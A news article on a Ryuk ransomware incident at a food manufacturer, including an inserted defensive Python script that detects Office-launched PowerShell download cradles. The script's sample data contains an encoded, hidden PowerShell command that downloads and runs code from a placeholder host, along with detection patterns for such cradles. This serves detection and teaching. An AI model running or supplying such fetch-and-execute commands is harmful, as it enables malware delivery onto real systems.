Ransomware: How clicking on one email left a whole business in big trouble

A food and drink manufacturer fell victim to a ransomware attack and, crucially, didn't give in to the extortion demand - but it could have been much worse.
Written by Danny Palmer, Senior Writer

Security experts have given an insight into how a targeted ransomware attack took down the network of a food and drink manufacturer after hackers took advantage of common security vulnerabilities.

The crooks used a phishing attack and took advantage of a number of vulnerabilities – from old hardware to default passwords – to first deploy Emotet and Trickbot malware before delivering the Ryuk ransomware and attempting to extort a fee from the victim to restore the network.

In this case, the organisation chose not to pay the ransom – something authorities discourage, since payments only fund further attacks by cyber criminals – and instead brought in security experts to examine the network and restore functionality within 48 hours.

"This was a targeted attack. This is targeting organisations such as this one which, if they don't have the security retainer or IT staff, the initial reaction would be to give in to the ransomware attack because they want to return their operations quickly," Bindu Sundaresan, director at AT&T cybersecurity, told ZDNet.


AT&T investigated the attack and helped the unnamed manufacturer get back online without giving in to the ransom demand, with as little disruption to production as possible. But the company would probably never have fallen victim if basic security weaknesses hadn't allowed the initial stages of the attack to succeed.

Ryuk, like some other forms of ransomware, is deployed as the final stage of a three-stage attack chain that also delivers Emotet and Trickbot. Emotet started life as a banking trojan before evolving into a botnet that is leased out to deliver other malware, in this case the Trickbot trojan.

Trickbot is a powerful form of malware that provides attackers with a full backdoor into compromised systems, including the ability to move around networks, issue commands and steal additional data.

After this, the hackers download the Ryuk ransomware onto the network, because cyber criminals view encrypting a compromised network as the quickest and easiest way to make money from it.

While many ransomware campaigns now begin by attacking exposed remote-access ports, this one began with a phishing email.

"A user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document, then malicious code executed a PowerShell command that downloaded an Emotet payload," Sundaresan explained.

Most ordinary users have no legitimate need to run PowerShell, so if its use had been restricted or blocked for accounts that don't need it, the attack could have been cut off at this point. A Word document launching PowerShell is in itself a strong signal that is worth alerting on, whether or not the process is blocked.
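The chain described above (Office document opens, PowerShell is spawned with an encoded download-and-execute command, Emotet is fetched) leaves a recognisable trace in process-creation telemetry. The following is an added example, not code from the article or from AT&T, showing how a triage script could pick that pattern out of Sysmon-style process-creation events. The event records, host names and the URL are constructed for the example; the field names mimic Sysmon Event ID 1 but the detection thresholds are assumptions, not a published rule.

```python
"""Triage constructed Windows process-creation events for an Office -> PowerShell
-> download-cradle chain. Added example; the sample records are made up."""
import base64
import re
from typing import Optional

# Office parents and the script/LOLBin hosts they should almost never launch.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# PowerShell accepts -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Common download-and-execute primitives ("cradles") used by macro droppers.
CRADLE_RE = re.compile(
    r"(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|Invoke-Expression|\biex\b|"
    r"FromBase64String|\bcurl\b|\bwget\b)")
# Flags that hide the window or skip profile/policy, typical of malicious launches.
EVASION_RE = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass)")


def encode_ps_command(text: str) -> str:
    """Build a value for -EncodedCommand exactly as PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Evaluate one process-creation event and list the indicators it trips."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Inspect both the raw command line and the decoded payload, if there is one.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawned_script_host:{parent}->{image}")
    if decoded is not None:
        reasons.append("encoded_command")
    if CRADLE_RE.search(text):
        reasons.append("download_cradle")
    if EVASION_RE.search(text):
        reasons.append("evasion_flags")
    return {"host": event.get("Computer"), "user": event.get("User"),
            "reasons": reasons, "decoded": decoded}


def triage(events, min_reasons: int = 2):
    """Return events that trip at least `min_reasons` indicators (threshold is an assumption).
    A lone indicator (an admin running PowerShell from Explorer) is noise; Office launching a
    hidden, encoded PowerShell download is not."""
    return [r for r in (analyze_event(e) for e in events) if len(r["reasons"]) >= min_reasons]


# Constructed sample events: one malicious launch, two benign ones.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://invoice.example.invalid/inv.php')"
SAMPLE_EVENTS = [
    {"Computer": "FIN-WS-07", "User": "CORP\\accounts.clerk",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps_command(_CRADLE)},
    {"Computer": "IT-WS-02", "User": "CORP\\helpdesk",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"Computer": "FIN-WS-07", "User": "CORP\\accounts.clerk",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",  # Word's normal print helper; must not be flagged
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], hit["reasons"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

Decoding the `-EncodedCommand` argument matters: the raw command line of the malicious launch contains no URL and no cradle keyword, so a rule that only greps the visible command line would miss it. In a real deployment the same logic would run against the SIEM's process-creation feed rather than an inline list.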

After Emotet had gained the initial foothold in the network, the next step was to use Trickbot to steal login credentials for corporate accounts and cloud services, then use those credentials to reach other parts of the network.

By repeating this cycle of credential theft and lateral movement, the cyber criminals gained control of over half the network before eventually deploying the Ryuk ransomware.

"Malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it's costing to their network, the valuable data that's being held – so they have a sense of urgency," said Sundaresan.

However, the attack could have been much worse: Ryuk compromised about 60% of the network, including ordering and billing applications, rather than all of it. This was partly because security personnel, called in by the manufacturer, were able to contain the attack before it spread further.

"The ability to contain it and the response time was crucial. The ability to contain the incident is the key to recover from it and having the business up and running before it got to the crucial databases," Sundaresan explained.

Within 48 hours, much of the business was back up and running again – crucially, without having given in to the criminals' ransom demand. Even so, two days of downtime would have been costly to the organisation and restoring the network is unlikely to have been cheap either – plus there is the cost of upgrading security in the aftermath so that attackers don't strike again.

And like many organisations that fall victim to cyberattacks, this one could have avoided the ransomware infection by keeping its cybersecurity hygiene in order – instead, simple-to-fix weaknesses were left for attackers to take advantage of.


For example, the vulnerabilities that Emotet, Trickbot and Ryuk exploit have been known for a long time, and the critical security updates that close them were issued years ago – yet some organisations still haven't applied them.

"Microsoft has put out patches but patch management and security hygiene still remain issues for organisations," said Sundaresan, who added that this ransomware attack could've also been prevented if strong passwords and multi-factor authentication had been used to secure systems.

"A lot of this can be prevented. If they didn't have default passwords and end-of-life machines, a lot of this would've been prevented."

And when it comes to cyberattacks, prevention is the best cure. Not only does it stop your organisation from falling victim to ransomware or other malware; securing the network in advance is almost certainly cheaper than doing so in the aftermath of an incident – especially one that disrupts operations or causes reputational damage that keeps customers away.

So while it might seem expensive, it could well be worth having outside security experts examine the network before damage is done – not after.

"Get a security assessment done from an offensive attacker point of view, you don't want to be just doing the security initiatives from compliance or internal testing – it's not enough. You have to get your network tested using multiple attack vectors and you have to do it objectively with full penetration testing," Sundaresan said.

Because ultimately, ransomware – be it Ryuk or another family – is still out there and remains a threat because too many organisations aren't following the security basics. Until that is fixed, ransomware will remain a problem.
